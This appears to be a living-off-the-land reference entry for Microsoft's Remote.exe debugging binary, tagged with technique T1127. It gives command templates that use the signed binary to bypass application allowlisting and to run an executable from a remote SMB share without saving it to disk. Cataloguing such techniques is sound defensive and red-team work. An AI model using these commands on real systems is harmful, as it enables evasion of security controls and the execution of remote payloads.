Remote.exe

type: OtherMSBinaries
Debugging tool included with Windows Debugging Tools

Full path

C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe

Commands

  1. AWL BypassUser T1127

    Executes a process under a trusted Microsoft signed binary

    Remote.exe /s {PATH:.exe} anythinghere

    Spawns specified executable as a child process of remote.exe

    os: Windows

    Execute: EXE

  2. ExecuteUser T1127

    Executes a process under a trusted Microsoft signed binary

    Remote.exe /s {PATH:.exe} anythinghere

    Spawns specified executable as a child process of remote.exe

    os: Windows

    Execute: EXE

  3. ExecuteUser T1127

    Executing a remote binary without saving file to disk

    Remote.exe /s {PATH_SMB:.exe} anythinghere

    Run a remote file

    os: Windows

    Execute: EXEExecute: Remote

Detection

Resources

acknowledgement: mr.d0x @mrd0x